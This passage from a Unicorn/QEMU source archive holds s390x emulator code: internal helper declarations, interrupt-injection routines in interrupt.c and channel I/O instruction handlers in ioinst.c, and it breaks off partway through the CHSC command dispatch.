CC_OP_SUB_64, /* overflow on subtraction (64bit) */ CC_OP_SUBU_64, /* overflow on unsigned subtraction (64bit) */ CC_OP_SUBB_64, /* overflow on unsigned sub-borrow (64bit) */ CC_OP_ABS_64, /* sign eval on abs (64bit) */ CC_OP_NABS_64, /* sign eval on nabs (64bit) */ CC_OP_ADD_32, /* overflow on add (32bit) */ CC_OP_ADDU_32, /* overflow on unsigned add (32bit) */ CC_OP_ADDC_32, /* overflow on unsigned add-carry (32bit) */ CC_OP_SUB_32, /* overflow on subtraction (32bit) */ CC_OP_SUBU_32, /* overflow on unsigned subtraction (32bit) */ CC_OP_SUBB_32, /* overflow on unsigned sub-borrow (32bit) */ CC_OP_ABS_32, /* sign eval on abs (64bit) */ CC_OP_NABS_32, /* sign eval on nabs (64bit) */ CC_OP_COMP_32, /* complement */ CC_OP_COMP_64, /* complement */ CC_OP_TM_32, /* test under mask (32bit) */ CC_OP_TM_64, /* test under mask (64bit) */ CC_OP_NZ_F32, /* FP dst != 0 (32bit) */ CC_OP_NZ_F64, /* FP dst != 0 (64bit) */ CC_OP_NZ_F128, /* FP dst != 0 (128bit) */ CC_OP_ICM, /* insert characters under mask */ CC_OP_SLA, /* Calculate shift left signed */ CC_OP_FLOGR, /* find leftmost one */ CC_OP_LCBB, /* load count to block boundary */ CC_OP_VC, /* vector compare result */ CC_OP_MAX }; static inline hwaddr decode_basedisp_s(CPUS390XState *env, uint32_t ipb, uint8_t *ar) { hwaddr addr = 0; uint8_t reg; reg = ipb >> 28; if (reg > 0) { addr = env->regs[reg]; } addr += (ipb >> 16) & 0xfff; if (ar) { *ar = reg; } return addr; } /* Base/displacement are at the same locations. */ #define decode_basedisp_rs decode_basedisp_s /* cc_helper.c */ const char *cc_name(enum cc_op cc_op); void load_psw(CPUS390XState *env, uint64_t mask, uint64_t addr); uint32_t calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr); /* cpu.c */ unsigned int s390_cpu_halt(S390CPU *cpu); void s390_cpu_unhalt(S390CPU *cpu); /* cpu_models.c */ void s390_cpu_model_register_props(CPUState *obj); void s390_cpu_model_class_register_props(CPUClass *oc); void s390_realize_cpu_model(CPUState *cs); CPUClass *s390_cpu_class_by_name(const char *name); /* excp_helper.c */ void s390x_cpu_debug_excp_handler(CPUState *cs); void s390_cpu_do_interrupt(CPUState *cpu); bool s390_cpu_exec_interrupt(CPUState *cpu, int int_req); bool s390_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void s390x_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); /* fpu_helper.c */ uint32_t set_cc_nz_f32(float32 v); uint32_t set_cc_nz_f64(float64 v); uint32_t set_cc_nz_f128(float128 v); #define S390_IEEE_MASK_INVALID 0x80 #define S390_IEEE_MASK_DIVBYZERO 0x40 #define S390_IEEE_MASK_OVERFLOW 0x20 #define S390_IEEE_MASK_UNDERFLOW 0x10 #define S390_IEEE_MASK_INEXACT 0x08 #define S390_IEEE_MASK_QUANTUM 0x04 uint8_t s390_softfloat_exc_to_ieee(unsigned int exc); int s390_swap_bfp_rounding_mode(CPUS390XState *env, int m3); void s390_restore_bfp_rounding_mode(CPUS390XState *env, int old_mode); int float_comp_to_cc(CPUS390XState *env, int float_compare); uint16_t float32_dcmask(CPUS390XState *env, float32 f1); uint16_t float64_dcmask(CPUS390XState *env, float64 f1); uint16_t float128_dcmask(CPUS390XState *env, float128 f1); /* gdbstub.c */ int s390_cpu_gdb_read_register(CPUState *cpu, GByteArray *buf, int reg); int s390_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); void s390_cpu_gdb_init(CPUState *cs); /* helper.c */ void s390_cpu_dump_state(CPUState *cpu, FILE *f, int flags); hwaddr s390_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); hwaddr s390_cpu_get_phys_addr_debug(CPUState *cpu, vaddr addr); uint64_t get_psw_mask(CPUS390XState *env); void s390_cpu_recompute_watchpoints(CPUState *cs); void s390x_tod_timer(void *opaque); void s390x_cpu_timer(void *opaque); void do_restart_interrupt(CPUS390XState *env); void s390_handle_wait(S390CPU *cpu); #define S390_STORE_STATUS_DEF_ADDR offsetof(LowCore, floating_pt_save_area) int s390_store_status(S390CPU *cpu, hwaddr addr, bool store_arch); int s390_store_adtl_status(S390CPU *cpu, hwaddr addr, hwaddr len); #ifndef CONFIG_USER_ONLY LowCore *cpu_map_lowcore(CPUS390XState *env); void cpu_unmap_lowcore(CPUS390XState *env, LowCore *lowcore); #endif /* CONFIG_USER_ONLY */ /* interrupt.c */ void trigger_pgm_exception(CPUS390XState *env, uint32_t code); void cpu_inject_clock_comparator(S390CPU *cpu); void cpu_inject_cpu_timer(S390CPU *cpu); void cpu_inject_emergency_signal(S390CPU *cpu, uint16_t src_cpu_addr); int cpu_inject_external_call(S390CPU *cpu, uint16_t src_cpu_addr); bool s390_cpu_has_io_int(S390CPU *cpu); bool s390_cpu_has_ext_int(S390CPU *cpu); bool s390_cpu_has_mcck_int(S390CPU *cpu); bool s390_cpu_has_int(S390CPU *cpu); bool s390_cpu_has_restart_int(S390CPU *cpu); bool s390_cpu_has_stop_int(S390CPU *cpu); void cpu_inject_restart(S390CPU *cpu); void cpu_inject_stop(S390CPU *cpu); /* ioinst.c */ void ioinst_handle_xsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_csch(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_hsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_msch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra); void ioinst_handle_ssch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra); void ioinst_handle_stcrw(S390CPU *cpu, uint32_t ipb, uintptr_t ra); void ioinst_handle_stsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra); int ioinst_handle_tsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra); void ioinst_handle_chsc(S390CPU *cpu, uint32_t ipb, uintptr_t ra); void ioinst_handle_schm(S390CPU *cpu, uint64_t reg1, uint64_t reg2, uint32_t ipb, uintptr_t ra); void ioinst_handle_rsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_rchp(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_sal(S390CPU *cpu, uint64_t reg1, uintptr_t ra); /* mem_helper.c */ target_ulong mmu_real2abs(CPUS390XState *env, target_ulong raddr); void probe_write_access(CPUS390XState *env, uint64_t addr, uint64_t len, uintptr_t ra); /* mmu_helper.c */ int mmu_translate(CPUS390XState *env, target_ulong vaddr, int rw, uint64_t asc, target_ulong *raddr, int *flags, uint64_t *tec); int mmu_translate_real(CPUS390XState *env, target_ulong raddr, int rw, target_ulong *addr, int *flags, uint64_t *tec); /* misc_helper.c */ int handle_diag_288(CPUS390XState *env, uint64_t r1, uint64_t r3); void handle_diag_308(CPUS390XState *env, uint64_t r1, uint64_t r3, uintptr_t ra); /* translate.c */ void s390x_translate_init(struct uc_struct *uc); /* sigp.c */ int handle_sigp(CPUS390XState *env, uint8_t order, uint64_t r1, uint64_t r3); void do_stop_interrupt(CPUS390XState *env); #endif /* S390X_INTERNAL_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/interrupt.c���������������������������������������������������������0000664�0000000�0000000�00000012552�14675241067�0020534�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU S/390 Interrupt support * * Copyright IBM Corp. 2012, 2014 * * This work is licensed under the terms of the GNU GPL, version 2 or (at your * option) any later version. See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" #include "hw/s390x/ioinst.h" #include "tcg_s390x.h" //#include "hw/s390x/s390_flic.h" /* Ensure to exit the TB after this call! */ void trigger_pgm_exception(CPUS390XState *env, uint32_t code) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_PGM; env->int_pgm_code = code; /* env->int_pgm_ilen is already set, or will be set during unwinding */ } void s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra) { tcg_s390_program_interrupt(env, code, ra); } void cpu_inject_clock_comparator(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_EXT_CLOCK_COMPARATOR; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_cpu_timer(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_EXT_CPU_TIMER; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_emergency_signal(S390CPU *cpu, uint16_t src_cpu_addr) { CPUS390XState *env = &cpu->env; g_assert(src_cpu_addr < S390_MAX_CPUS); set_bit(src_cpu_addr, env->emergency_signals); env->pending_int |= INTERRUPT_EMERGENCY_SIGNAL; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } int cpu_inject_external_call(S390CPU *cpu, uint16_t src_cpu_addr) { CPUS390XState *env = &cpu->env; g_assert(src_cpu_addr < S390_MAX_CPUS); if (env->pending_int & INTERRUPT_EXTERNAL_CALL) { return -EBUSY; } env->external_call_addr = src_cpu_addr; env->pending_int |= INTERRUPT_EXTERNAL_CALL; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); return 0; } void cpu_inject_restart(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_RESTART; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_stop(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_STOP; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } /* * All of the following interrupts are floating, i.e. not per-vcpu. * We just need a dummy cpustate in order to be able to inject in the * non-kvm case. */ void s390_sclp_extint(uint32_t parm) { #if 0 S390FLICState *fs = s390_get_flic(); S390FLICStateClass *fsc = s390_get_flic_class(fs); fsc->inject_service(fs, parm); #endif } void s390_io_interrupt(uint16_t subchannel_id, uint16_t subchannel_nr, uint32_t io_int_parm, uint32_t io_int_word) { #if 0 S390FLICState *fs = s390_get_flic(); S390FLICStateClass *fsc = s390_get_flic_class(fs); fsc->inject_io(fs, subchannel_id, subchannel_nr, io_int_parm, io_int_word); #endif } void s390_crw_mchk(void) { #if 0 S390FLICState *fs = s390_get_flic(); S390FLICStateClass *fsc = s390_get_flic_class(fs); fsc->inject_crw_mchk(fs); #endif } bool s390_cpu_has_mcck_int(S390CPU *cpu) { #if 0 QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic()); CPUS390XState *env = &cpu->env; if (!(env->psw.mask & PSW_MASK_MCHECK)) { return false; } /* for now we only support channel report machine checks (floating) */ if (qemu_s390_flic_has_crw_mchk(flic) && (env->cregs[14] & CR14_CHANNEL_REPORT_SC)) { return true; } #endif return false; } bool s390_cpu_has_ext_int(S390CPU *cpu) { #if 0 QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic()); CPUS390XState *env = &cpu->env; if (!(env->psw.mask & PSW_MASK_EXT)) { return false; } if ((env->pending_int & INTERRUPT_EMERGENCY_SIGNAL) && (env->cregs[0] & CR0_EMERGENCY_SIGNAL_SC)) { return true; } if ((env->pending_int & INTERRUPT_EXTERNAL_CALL) && (env->cregs[0] & CR0_EXTERNAL_CALL_SC)) { return true; } if ((env->pending_int & INTERRUPT_EXTERNAL_CALL) && (env->cregs[0] & CR0_EXTERNAL_CALL_SC)) { return true; } if ((env->pending_int & INTERRUPT_EXT_CLOCK_COMPARATOR) && (env->cregs[0] & CR0_CKC_SC)) { return true; } if ((env->pending_int & INTERRUPT_EXT_CPU_TIMER) && (env->cregs[0] & CR0_CPU_TIMER_SC)) { return true; } if (qemu_s390_flic_has_service(flic) && (env->cregs[0] & CR0_SERVICE_SC)) { return true; } #endif return false; } bool s390_cpu_has_io_int(S390CPU *cpu) { #if 0 QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic()); CPUS390XState *env = &cpu->env; if (!(env->psw.mask & PSW_MASK_IO)) { return false; } return qemu_s390_flic_has_io(flic, env->cregs[6]); #endif return false; } bool s390_cpu_has_restart_int(S390CPU *cpu) { return false; #if 0 CPUS390XState *env = &cpu->env; return env->pending_int & INTERRUPT_RESTART; #endif } bool s390_cpu_has_stop_int(S390CPU *cpu) { CPUS390XState *env = &cpu->env; return env->pending_int & INTERRUPT_STOP; } bool s390_cpu_has_int(S390CPU *cpu) { return s390_cpu_has_mcck_int(cpu) || s390_cpu_has_ext_int(cpu) || s390_cpu_has_io_int(cpu) || s390_cpu_has_restart_int(cpu) || s390_cpu_has_stop_int(cpu); } ������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/ioinst.c������������������������������������������������������������0000664�0000000�0000000�00000050270�14675241067�0020004�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * I/O instructions for S/390 * * Copyright 2012, 2015 IBM Corp. * Author(s): Cornelia Huck <cornelia.huck@de.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "hw/s390x/ioinst.h" //#include "hw/s390x/s390-pci-bus.h" int ioinst_disassemble_sch_ident(uint32_t value, int *m, int *cssid, int *ssid, int *schid) { if (!IOINST_SCHID_ONE(value)) { return -EINVAL; } if (!IOINST_SCHID_M(value)) { if (IOINST_SCHID_CSSID(value)) { return -EINVAL; } *cssid = 0; *m = 0; } else { *cssid = IOINST_SCHID_CSSID(value); *m = 1; } *ssid = IOINST_SCHID_SSID(value); *schid = IOINST_SCHID_NR(value); return 0; } void ioinst_handle_xsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("xsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_xsch(sch)); #endif } void ioinst_handle_csch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("csch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_csch(sch)); #endif } void ioinst_handle_hsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("hsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_hsch(sch)); #endif } #if 0 static int ioinst_schib_valid(SCHIB *schib) { if ((be16_to_cpu(schib->pmcw.flags) & PMCW_FLAGS_MASK_INVALID) || (be32_to_cpu(schib->pmcw.chars) & PMCW_CHARS_MASK_INVALID)) { return 0; } /* Disallow extended measurements for now. */ if (be32_to_cpu(schib->pmcw.chars) & PMCW_CHARS_MASK_XMWME) { return 0; } return 1; } #endif void ioinst_handle_msch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; SCHIB schib; uint64_t addr; CPUS390XState *env = &cpu->env; uint8_t ar; addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } if (s390_cpu_virt_mem_read(cpu, addr, ar, &schib, sizeof(schib))) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid) || !ioinst_schib_valid(&schib)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("msch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_msch(sch, &schib)); #endif } #if 0 static void copy_orb_from_guest(ORB *dest, const ORB *src) { dest->intparm = be32_to_cpu(src->intparm); dest->ctrl0 = be16_to_cpu(src->ctrl0); dest->lpm = src->lpm; dest->ctrl1 = src->ctrl1; dest->cpa = be32_to_cpu(src->cpa); } static int ioinst_orb_valid(ORB *orb) { if ((orb->ctrl0 & ORB_CTRL0_MASK_INVALID) || (orb->ctrl1 & ORB_CTRL1_MASK_INVALID)) { return 0; } /* We don't support MIDA. */ if (orb->ctrl1 & ORB_CTRL1_MASK_MIDAW) { return 0; } if ((orb->cpa & HIGH_ORDER_BIT) != 0) { return 0; } return 1; } #endif void ioinst_handle_ssch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; ORB orig_orb, orb; uint64_t addr; CPUS390XState *env = &cpu->env; uint8_t ar; addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } if (s390_cpu_virt_mem_read(cpu, addr, ar, &orig_orb, sizeof(orb))) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } copy_orb_from_guest(&orb, &orig_orb); if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid) || !ioinst_orb_valid(&orb)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("ssch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_ssch(sch, &orb)); #endif } void ioinst_handle_stcrw(S390CPU *cpu, uint32_t ipb, uintptr_t ra) { #if 0 CRW crw; uint64_t addr; int cc; CPUS390XState *env = &cpu->env; uint8_t ar; addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } cc = css_do_stcrw(&crw); /* 0 - crw stored, 1 - zeroes stored */ if (s390_cpu_virt_mem_write(cpu, addr, ar, &crw, sizeof(crw)) == 0) { setcc(cpu, cc); } else { if (cc == 0) { /* Write failed: requeue CRW since STCRW is suppressing */ css_undo_stcrw(&crw); } s390_cpu_virt_mem_handle_exc(cpu, ra); } #endif } void ioinst_handle_stsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; uint64_t addr; int cc; SCHIB schib; CPUS390XState *env = &cpu->env; uint8_t ar; addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { /* * As operand exceptions have a lower priority than access exceptions, * we check whether the memory area is writeable (injecting the * access execption if it is not) first. */ if (!s390_cpu_virt_mem_check_write(cpu, addr, ar, sizeof(schib))) { s390_program_interrupt(env, PGM_OPERAND, ra); } else { s390_cpu_virt_mem_handle_exc(cpu, ra); } return; } trace_ioinst_sch_id("stsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (sch) { if (css_subch_visible(sch)) { css_do_stsch(sch, &schib); cc = 0; } else { /* Indicate no more subchannels in this css/ss */ cc = 3; } } else { if (css_schid_final(m, cssid, ssid, schid)) { cc = 3; /* No more subchannels in this css/ss */ } else { /* Store an empty schib. */ memset(&schib, 0, sizeof(schib)); cc = 0; } } if (cc != 3) { if (s390_cpu_virt_mem_write(cpu, addr, ar, &schib, sizeof(schib)) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } } else { /* Access exceptions have a higher priority than cc3 */ if (s390_cpu_virt_mem_check_write(cpu, addr, ar, sizeof(schib)) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } } setcc(cpu, cc); #endif } int ioinst_handle_tsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 CPUS390XState *env = &cpu->env; int cssid, ssid, schid, m; SubchDev *sch; IRB irb; uint64_t addr; int cc, irb_len; uint8_t ar; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(env, PGM_OPERAND, ra); return -EIO; } trace_ioinst_sch_id("tsch", cssid, ssid, schid); addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return -EIO; } sch = css_find_subch(m, cssid, ssid, schid); if (sch && css_subch_visible(sch)) { cc = css_do_tsch_get_irb(sch, &irb, &irb_len); } else { cc = 3; } /* 0 - status pending, 1 - not status pending, 3 - not operational */ if (cc != 3) { if (s390_cpu_virt_mem_write(cpu, addr, ar, &irb, irb_len) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return -EFAULT; } css_do_tsch_update_subch(sch); } else { irb_len = sizeof(irb) - sizeof(irb.emw); /* Access exceptions have a higher priority than cc3 */ if (s390_cpu_virt_mem_check_write(cpu, addr, ar, irb_len) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return -EFAULT; } } setcc(cpu, cc); #endif return 0; } QEMU_PACK(typedef struct ChscReq { uint16_t len; uint16_t command; uint32_t param0; uint32_t param1; uint32_t param2; }) ChscReq; QEMU_PACK(typedef struct ChscResp { uint16_t len; uint16_t code; uint32_t param; char data[]; }) ChscResp; #define CHSC_MIN_RESP_LEN 0x0008 #define CHSC_SCPD 0x0002 #define CHSC_SCSC 0x0010 #define CHSC_SDA 0x0031 #define CHSC_SEI 0x000e #define CHSC_SCPD_0_M 0x20000000 #define CHSC_SCPD_0_C 0x10000000 #define CHSC_SCPD_0_FMT 0x0f000000 #define CHSC_SCPD_0_CSSID 0x00ff0000 #define CHSC_SCPD_0_RFMT 0x00000f00 #define CHSC_SCPD_0_RES 0xc000f000 #define CHSC_SCPD_1_RES 0xffffff00 #define CHSC_SCPD_01_CHPID 0x000000ff static void ioinst_handle_chsc_scpd(ChscReq *req, ChscResp *res) { #if 0 uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint32_t param1 = be32_to_cpu(req->param1); uint16_t resp_code; int rfmt; uint16_t cssid; uint8_t f_chpid, l_chpid; int desc_size; int m; rfmt = (param0 & CHSC_SCPD_0_RFMT) >> 8; if ((rfmt == 0) || (rfmt == 1)) { rfmt = !!(param0 & CHSC_SCPD_0_C); } if ((len != 0x0010) || (param0 & CHSC_SCPD_0_RES) || (param1 & CHSC_SCPD_1_RES) || req->param2) { resp_code = 0x0003; goto out_err; } if (param0 & CHSC_SCPD_0_FMT) { resp_code = 0x0007; goto out_err; } cssid = (param0 & CHSC_SCPD_0_CSSID) >> 16; m = param0 & CHSC_SCPD_0_M; if (cssid != 0) { if (!m || !css_present(cssid)) { resp_code = 0x0008; goto out_err; } } f_chpid = param0 & CHSC_SCPD_01_CHPID; l_chpid = param1 & CHSC_SCPD_01_CHPID; if (l_chpid < f_chpid) { resp_code = 0x0003; goto out_err; } /* css_collect_chp_desc() is endian-aware */ desc_size = css_collect_chp_desc(m, cssid, f_chpid, l_chpid, rfmt, &res->data); res->code = cpu_to_be16(0x0001); res->len = cpu_to_be16(8 + desc_size); res->param = cpu_to_be32(rfmt); return; out_err: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = cpu_to_be32(rfmt); #endif } #define CHSC_SCSC_0_M 0x20000000 #define CHSC_SCSC_0_FMT 0x000f0000 #define CHSC_SCSC_0_CSSID 0x0000ff00 #define CHSC_SCSC_0_RES 0xdff000ff static void ioinst_handle_chsc_scsc(ChscReq *req, ChscResp *res) { #if 0 uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint8_t cssid; uint16_t resp_code; uint32_t general_chars[510]; uint32_t chsc_chars[508]; if (len != 0x0010) { resp_code = 0x0003; goto out_err; } if (param0 & CHSC_SCSC_0_FMT) { resp_code = 0x0007; goto out_err; } cssid = (param0 & CHSC_SCSC_0_CSSID) >> 8; if (cssid != 0) { if (!(param0 & CHSC_SCSC_0_M) || !css_present(cssid)) { resp_code = 0x0008; goto out_err; } } if ((param0 & CHSC_SCSC_0_RES) || req->param1 || req->param2) { resp_code = 0x0003; goto out_err; } res->code = cpu_to_be16(0x0001); res->len = cpu_to_be16(4080); res->param = 0; memset(general_chars, 0, sizeof(general_chars)); memset(chsc_chars, 0, sizeof(chsc_chars)); general_chars[0] = cpu_to_be32(0x03000000); general_chars[1] = cpu_to_be32(0x00079000); general_chars[3] = cpu_to_be32(0x00080000); chsc_chars[0] = cpu_to_be32(0x40000000); chsc_chars[3] = cpu_to_be32(0x00040000); memcpy(res->data, general_chars, sizeof(general_chars)); memcpy(res->data + sizeof(general_chars), chsc_chars, sizeof(chsc_chars)); return; out_err: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = 0; #endif } #define CHSC_SDA_0_FMT 0x0f000000 #define CHSC_SDA_0_OC 0x0000ffff #define CHSC_SDA_0_RES 0xf0ff0000 #define CHSC_SDA_OC_MCSSE 0x0 #define CHSC_SDA_OC_MSS 0x2 static void ioinst_handle_chsc_sda(ChscReq *req, ChscResp *res) { #if 0 uint16_t resp_code = 0x0001; uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint16_t oc; int ret; if ((len != 0x0400) || (param0 & CHSC_SDA_0_RES)) { resp_code = 0x0003; goto out; } if (param0 & CHSC_SDA_0_FMT) { resp_code = 0x0007; goto out; } oc = param0 & CHSC_SDA_0_OC; switch (oc) { case CHSC_SDA_OC_MCSSE: ret = css_enable_mcsse(); if (ret == -EINVAL) { resp_code = 0x0101; goto out; } break; case CHSC_SDA_OC_MSS: ret = css_enable_mss(); if (ret == -EINVAL) { resp_code = 0x0101; goto out; } break; default: resp_code = 0x0003; goto out; } out: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = 0; #endif } #if 0 static int chsc_sei_nt0_get_event(void *res) { /* no events yet */ return 1; } static int chsc_sei_nt0_have_event(void) { /* no events yet */ return 0; } #endif #if 0 static int chsc_sei_nt2_get_event(void *res) { if (s390_has_feat(uc, S390_FEAT_ZPCI)) { // return pci_chsc_sei_nt2_get_event(res); } return 1; } static int chsc_sei_nt2_have_event(void) { if (s390_has_feat(uc, S390_FEAT_ZPCI)) { // return pci_chsc_sei_nt2_have_event(); } return 0; } #endif #define CHSC_SEI_NT0 (1ULL << 63) #define CHSC_SEI_NT2 (1ULL << 61) static void ioinst_handle_chsc_sei(ChscReq *req, ChscResp *res) { #if 0 uint64_t selection_mask = ldq_p(&req->param1); uint8_t *res_flags = (uint8_t *)res->data; int have_event = 0; int have_more = 0; /* regarding architecture nt0 can not be masked */ have_event = !chsc_sei_nt0_get_event(res); have_more = chsc_sei_nt0_have_event(); if (selection_mask & CHSC_SEI_NT2) { if (!have_event) { have_event = !chsc_sei_nt2_get_event(res); } if (!have_more) { have_more = chsc_sei_nt2_have_event(); } } if (have_event) { res->code = cpu_to_be16(0x0001); if (have_more) { (*res_flags) |= 0x80; } else { (*res_flags) &= ~0x80; css_clear_sei_pending(); } } else { res->code = cpu_to_be16(0x0005); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); } #endif } static void ioinst_handle_chsc_unimplemented(ChscResp *res) { res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->code = cpu_to_be16(0x0004); res->param = 0; } void ioinst_handle_chsc(S390CPU *cpu, uint32_t ipb, uintptr_t ra) { ChscReq *req; ChscResp *res; uint64_t addr; int reg; uint16_t len; uint16_t command; CPUS390XState *env = &cpu->env; uint8_t buf[TARGET_PAGE_SIZE]; reg = (ipb >> 20) & 0x00f; addr = env->regs[reg]; /* Page boundary? */ if (addr & 0xfff) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } /* * Reading sizeof(ChscReq) bytes is currently enough for all of our * present CHSC sub-handlers ... if we ever need more, we should take * care of req->len here first. */ if (s390_cpu_virt_mem_read(cpu, addr, reg, buf, sizeof(ChscReq))) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } req = (ChscReq *)buf; len = be16_to_cpu(req->len); /* Length field valid? */ if ((len < 16) || (len > 4088) || (len & 7)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } memset((char *)req + len, 0, TARGET_PAGE_SIZE - len); res = (void *)((char *)req + len); command = be16_to_cpu(req->command); switch (command) { case CHSC_SCSC: ioinst_handle_chsc_scsc(req, res); break; case CHSC_SCPD: ioinst_handle_chsc_scpd(req, res); break; case CHSC_SDA: ioinst_handle_chsc_sda(req, res); break; case CHSC_SEI: ioinst_handle_chsc_sei(req, res); break; default: 